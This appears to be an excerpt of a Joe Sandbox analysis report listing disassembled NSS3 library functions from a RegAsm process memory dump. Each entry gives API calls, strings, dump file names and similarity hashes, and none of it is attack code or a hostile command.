Function 6C260ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C260EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C260EFA

Part of subcall function 6C14AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C14AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C260F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C260F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C260F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C260F2B

Strings

Aborting, xrefs: 6C260EB3
Assertion failure: %s, at %s:%d, xrefs: 6C260ED9, 6C260EE5, 6C260F06, 6C260F0B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: d50e967270b1374d0c8b620394a3f81c63b35b0d899282e7b3d0720f752e3ecb
Instruction ID: ad2886f00af47b583ee3824e73f8b0fe098824172de77dc5e19173fdfcf3de82
Opcode Fuzzy Hash: d50e967270b1374d0c8b620394a3f81c63b35b0d899282e7b3d0720f752e3ecb
Instruction Fuzzy Hash: B401C0B5900118ABDF01AFA5EC89CAB3F7DEF46664F004024FD0997B41DA32E950D7B2

Function 6C224D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C224DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C224DE0

Strings

%s at line %d of [%.10s], xrefs: 6C224DDA
invalid, xrefs: 6C224DB8
API call with %s database connection pointer, xrefs: 6C224DBD
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C224DCB
misuse, xrefs: 6C224DD5

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: a30e226d587f93011d90f2f168b3e927a46526009b85aec5c18ea4acfdf15ca4
Instruction ID: 78dcc7965fba1f6a997492bb09b3221f0989a56cb1125bcd46c982f069ce3038
Opcode Fuzzy Hash: a30e226d587f93011d90f2f168b3e927a46526009b85aec5c18ea4acfdf15ca4
Instruction Fuzzy Hash: CFF0E229F1567E6BD7009115CC21F8637954F0232AF8609E2FE086BEE2D60EA89882D1

Function 6C224DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C224E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C224E4D

Strings

%s at line %d of [%.10s], xrefs: 6C224E47
invalid, xrefs: 6C224E25
API call with %s database connection pointer, xrefs: 6C224E2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C224E38
misuse, xrefs: 6C224E42

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: f76f51b9fe6c94935a2be2f114505a866e8615e1669196b2148510e158254af7
Instruction ID: 3634292f42612875ef226e19d6fa28b397d15295b5ec356eeec9162b8d7604f3
Opcode Fuzzy Hash: f76f51b9fe6c94935a2be2f114505a866e8615e1669196b2148510e158254af7
Instruction Fuzzy Hash: E2F02721F4592D2BF71490299C20F8737854B0132AF4944B1FE0C6BEE2D70D9C6842D1

Function 6C190C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C191444,?,00000001,?,00000000,00000000,?,?,6C191444,?,?,00000000,?,?), ref: 6C190CB3

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?,?,6C191444,?), ref: 6C190DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?,?,6C191444,?), ref: 6C190DEC

Part of subcall function 6C1B0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C152AF5,?,?,?,?,?,6C150A1B,00000000), ref: 6C1B0F1A
Part of subcall function 6C1B0F10: malloc.MOZGLUE(00000001), ref: 6C1B0F30
Part of subcall function 6C1B0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C1B0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?), ref: 6C190DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C191444,?,00000001,?,00000000), ref: 6C190E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?), ref: 6C190E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?,?,6C191444,?,?,00000000), ref: 6C190E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?), ref: 6C190E79

Part of subcall function 6C1A1560: TlsGetValue.KERNEL32(00000000,?,6C170844,?), ref: 6C1A157A
Part of subcall function 6C1A1560: EnterCriticalSection.KERNEL32(?,?,?,6C170844,?), ref: 6C1A158F
Part of subcall function 6C1A1560: PR_Unlock.NSS3(?,?,?,?,6C170844,?), ref: 6C1A15B2

Part of subcall function 6C16B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C171397,00000000,?,6C16CF93,5B5F5EC0,00000000,?,6C171397,?), ref: 6C16B1CB
Part of subcall function 6C16B1A0: free.MOZGLUE(5B5F5EC0,?,6C16CF93,5B5F5EC0,00000000,?,6C171397,?), ref: 6C16B1D2

Part of subcall function 6C1689E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C1688AE,-00000008), ref: 6C168A04
Part of subcall function 6C1689E0: EnterCriticalSection.KERNEL32(?), ref: 6C168A15
Part of subcall function 6C1689E0: memset.VCRUNTIME140(6C1688AE,00000000,00000132), ref: 6C168A27
Part of subcall function 6C1689E0: PR_Unlock.NSS3(?), ref: 6C168A35

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 152f098c0488574cece97a44a6ca9039a2b5381947b8eef851bef538fbeabf28
Instruction ID: 552a3f4f18b0e1870a7b098046e5f0c1c327c2386b42972912b3898cea179eac
Opcode Fuzzy Hash: 152f098c0488574cece97a44a6ca9039a2b5381947b8eef851bef538fbeabf28
Instruction Fuzzy Hash: 1451C7B6E002019FEB109F64DC85BAB37E8EF19218F150064EC1997B12FB31ED1987A2

Function 6C146E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C146ED8
sqlite3_value_text.NSS3(?,?), ref: 6C146EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C146FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C146FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C146FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C147010
sqlite3_value_blob.NSS3(?,?), ref: 6C14701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C147052

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 7d3019937e861e7eb356b5ed737040a0b7c6abb39eadaabf2890b9a4d87e104e
Instruction ID: 5a81cfd05c43ea1df95bc60a2232dc9b6c46a1b13177ff92279d32969b3e4164
Opcode Fuzzy Hash: 7d3019937e861e7eb356b5ed737040a0b7c6abb39eadaabf2890b9a4d87e104e
Instruction Fuzzy Hash: BE61E4B1E1520A8FDB01CF65C8107EFB7B2AF4530CF1881A5D854ABB51E7369C06CBA0

Function 6C1B8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C1B7313), ref: 6C1B8FBB

Part of subcall function 6C1B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C158298,?,?,?,6C14FCE5,?), ref: 6C1B07BF
Part of subcall function 6C1B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C1B07E6
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B081B
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C1B7313), ref: 6C1B9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C1B7313), ref: 6C1B903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C1B7313), ref: 6C1B909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C1B7313), ref: 6C1B90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C1B7313), ref: 6C1B90F1

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C1B7313), ref: 6C1B906B

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C1B7313), ref: 6C1B9128

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 8ea8fdfee7edf574c635881d680062309907324942d8674baeeda434e20c96b2
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: 7951C571B002029FEB10CF6ADC94B26B3F9AF65328F154069D919E7B61E735E806CF91

Function 6C169C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6C168850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C170715), ref: 6C168859
Part of subcall function 6C168850: PR_NewLock.NSS3 ref: 6C168874
Part of subcall function 6C168850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C16888D

PR_NewLock.NSS3 ref: 6C169CAD

Part of subcall function 6C2198D0: calloc.MOZGLUE(00000001,00000084,6C140936,00000001,?,6C14102C), ref: 6C2198E5

Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407AD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407CD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407D6
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C0D204A), ref: 6C1407E4
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,6C0D204A), ref: 6C140864
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C140880
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,6C0D204A), ref: 6C1408CB
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408D7
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408FB

TlsGetValue.KERNEL32 ref: 6C169CE8
EnterCriticalSection.KERNEL32(?,?,6C16ECEC,6C172FCD,00000000,?,6C172FCD,?), ref: 6C169D01
TlsGetValue.KERNEL32(?,?,?,6C16ECEC,6C172FCD,00000000,?,6C172FCD,?), ref: 6C169D38
EnterCriticalSection.KERNEL32(?,?,6C16ECEC,6C172FCD,00000000,?,6C172FCD,?), ref: 6C169D4D
PR_Unlock.NSS3 ref: 6C169D70
PR_Unlock.NSS3 ref: 6C169DC3
PR_NewLock.NSS3 ref: 6C169DDD

Part of subcall function 6C1688D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C170725,00000000,00000058), ref: 6C168906
Part of subcall function 6C1688D0: EnterCriticalSection.KERNEL32(?), ref: 6C16891A
Part of subcall function 6C1688D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C16894A
Part of subcall function 6C1688D0: calloc.MOZGLUE(00000001,6C17072D,00000000,00000000,00000000,?,6C170725,00000000,00000058), ref: 6C168959
Part of subcall function 6C1688D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C168993
Part of subcall function 6C1688D0: PR_Unlock.NSS3(?), ref: 6C1689AF

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: 698984b3eb1cfa1f45eae95618486fbbad58396bf5e37ff8fca50b5da941f858
Instruction ID: 446e1250b004ec40f7ce247a043feb02c664c50e744df78ccb722d591d5ee94a
Opcode Fuzzy Hash: 698984b3eb1cfa1f45eae95618486fbbad58396bf5e37ff8fca50b5da941f858
Instruction Fuzzy Hash: A7516FB0A047058FDB00EF6AC09466EBBF0BF44349F158529DC98DBB40EB30E8A4CB91

Function 6C174E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C174E90
EnterCriticalSection.KERNEL32 ref: 6C174EA9
TlsGetValue.KERNEL32 ref: 6C174EC6
EnterCriticalSection.KERNEL32 ref: 6C174EDF
PL_HashTableLookup.NSS3 ref: 6C174EF8
PR_Unlock.NSS3 ref: 6C174F05
PR_Now.NSS3 ref: 6C174F13
PR_Unlock.NSS3 ref: 6C174F3A

Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407AD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407CD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407D6
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C0D204A), ref: 6C1407E4
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,6C0D204A), ref: 6C140864
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C140880
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,6C0D204A), ref: 6C1408CB
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408D7
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408FB

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 72833e79cacbc2909170c37f739fdf09cceffe4f7b634c3c7715ed83337617c4
Instruction ID: 413336be5e976af2ed1229014256d1454b5010be7b4948f0f34c32eb62593469
Opcode Fuzzy Hash: 72833e79cacbc2909170c37f739fdf09cceffe4f7b634c3c7715ed83337617c4
Instruction Fuzzy Hash: 3B415CB4A046059FCB00EF7DD4849AABBF0FF49354B018569EC999B750EB30E895CFA1

Function 6C15DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C15DCFA

Part of subcall function 6C219DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DC6
Part of subcall function 6C219DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DD1
Part of subcall function 6C219DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C219DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C15DD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C15DD62
CERT_DestroyCertificate.NSS3(?), ref: 6C15DD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6C15DD81
CERT_RemoveCertListNode.NSS3(?), ref: 6C15DD8F

Part of subcall function 6C1706A0: TlsGetValue.KERNEL32 ref: 6C1706C2
Part of subcall function 6C1706A0: EnterCriticalSection.KERNEL32(?), ref: 6C1706D6
Part of subcall function 6C1706A0: PR_Unlock.NSS3 ref: 6C1706EB

CERT_DestroyCertificate.NSS3(?), ref: 6C15DD9E
CERT_DestroyCertificate.NSS3(?), ref: 6C15DDB7

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: e6d5450551639d001e1ed31762a0a5827c30625cac73ac07e5126f44a0565daa
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: 2521CCF6E011199BDB01AFA4DD40A9EB7B4AF15218F850020EC28A7751E731E925CBE2

Function 6C153C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6C1C460B,?,?), ref: 6C153CA9
EnterCriticalSection.KERNEL32(?), ref: 6C153CB9
PL_HashTableLookup.NSS3(?), ref: 6C153CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6C153CD6
PR_Unlock.NSS3 ref: 6C153CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C153CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C153D03
PR_Unlock.NSS3 ref: 6C153D15

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: 423e1712cf68305bb2e5e4cc2e53e6468fc1687c736544c26465ba29ebf6ac6c
Instruction ID: ec5f403a29f786fbe284f28c4476e7bce134eca41675100077699a4824f71aa4
Opcode Fuzzy Hash: 423e1712cf68305bb2e5e4cc2e53e6468fc1687c736544c26465ba29ebf6ac6c
Instruction Fuzzy Hash: 981180F6E0050467DB012B34EC089BA7A78EB1225CBD54530EC3883741FB22D879C7E1

Function 6C1C8C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C1C8C93

